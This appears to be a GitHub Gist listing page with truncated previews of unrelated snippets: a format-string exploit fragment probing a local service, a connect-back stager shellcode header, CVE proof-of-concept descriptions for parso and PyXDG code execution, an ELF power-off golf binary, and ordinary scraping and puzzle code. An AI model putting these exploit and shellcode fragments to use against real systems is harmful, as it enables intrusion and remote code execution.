@LiveOverflow
LiveOverflow / asd.py
Last active October 14, 2024 23:18
C Application Firewall
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
    r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9
@geohot
geohot / aoc16.cc
Created December 16, 2019 17:02
AoC 16 Part 2, works for all offsets
#include <vector>
int main() {
//char cdat[] = "12345678";
char cdat[] = "59791911701697178620772166487621926539855976237879300869872931303532122404711706813176657053802481833015214226705058704017099411284046473395211022546662450403964137283487707691563442026697656820695854453826690487611172860358286255850668069507687936410599520475680695180527327076479119764897119494161366645257480353063266653306023935874821274026377407051958316291995144593624792755553923648392169597897222058613725620920233283869036501950753970029182181770358827133737490530431859833065926816798051237510954742209939957376506364926219879150524606056996572743773912030397695613203835011524677640044237824961662635530619875905369208905866913334027160178";
//char cdat[] = "03036732577212944063491565474664";
int N = strlen(cdat)*10000;
int *dat = new int[N];
int *cc = new int[N+1];
for (int j = 0; j < N; j+=strlen(cdat)) {
@JohnTroony
JohnTroony / reverse_stager_shellcode.asm
Last active July 14, 2025 20:42
x86 Shellcoding: PoC code for connect-back shellcode that fetches a second-stage shellcode and executes it.
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
@jesusmartinoza
jesusmartinoza / scrapper.py
Created October 17, 2019 05:06
Simple Web Scrapper using Selenium and Beautiful Soup. Example, download Pokemon sprites
from selenium import webdriver
from bs4 import BeautifulSoup
import urllib.request
import os
import requests
driver = webdriver.Chrome("./chromedriver")
# Set the URL you want to webscrap from
# Example website with tons of Pokemon Sprites
@dhondta
dhondta / README.md
Last active June 9, 2025 07:59
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)

CVE-2019-12760 - ACE in Python's parso Module

Description

** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."

References

@dhondta
dhondta / README.md
Last active June 9, 2025 08:00
Proof-of-Concept for python-xdg 0.25 Python code injection (CVE-2019-12761)

CVE-2019-12761 - Code Injection in Python's xdg Module

Description

A code injection issue was discovered in PyXDG before 0.26 via crafted Python code in a Category element of a Menu XML document in a .menu file. XDG_CONFIG_DIRS must be set up to trigger xdg.Menu.parse parsing within the directory containing this file. This is due to a lack of sanitization in xdg/Menu.py before an eval call.

References

@netspooky
netspooky / bye.asm
Last active June 23, 2021 01:06
For write up
; 84 byte LINUX_REBOOT_CMD_POWER_OFF Binary Golf
BITS 64
org 0x100000000
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+
; CODE LISTING | OFFS | ASSEMBLY | CODE COMMENT | ELF HEADER STRUCT | PHDR |
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+
db 0x7F, "ELF" ; 0x0 | 7f454c46 | PROTIP: Can use magic as a constant ;) | ELF Magic | |
_start: ;------|------------|------------------------------------------|-----------------------------|----------|
mov edx, 0x4321fedc ; 0x04 | badcfe2143 | Moving magic values... | ei_class,ei_data,ei_version | |
mov esi, 0x28121969 ; 0x09 | be69191228 | into their respective places | unused | |
@netspooky
netspooky / exit.asm
Last active June 23, 2021 01:10
For writeup
BITS 64
org 0x100000000 ; Where to load this into memory
;----------------------+------+-------------+----------+------------------------
; ELF Header struct | OFFS | ELFHDR | PHDR | ASSEMBLY OUTPUT
;----------------------+------+-------------+----------+------------------------
db 0x7F, "ELF" ; 0x00 | e_ident | | 7f 45 4c 46
_start: mov al,0x3c ; 0x04 | ei_class | | b0
; 0x05 | ei_data | | 3c
@qzchenwl
qzchenwl / setup.sh
Last active March 29, 2021 06:42
k8s-master on centos7
# 0. SYSTEM INFO & CLUSTER ARCH
# CentOS 7
#
# +------------+ +-----------+
# | k8s-master |>192.168.99.20 -- 192.168.99.21<| k8s-node1 |
# +------------+ +-----------+
# v v
# internet internet
#
# /etc/hosts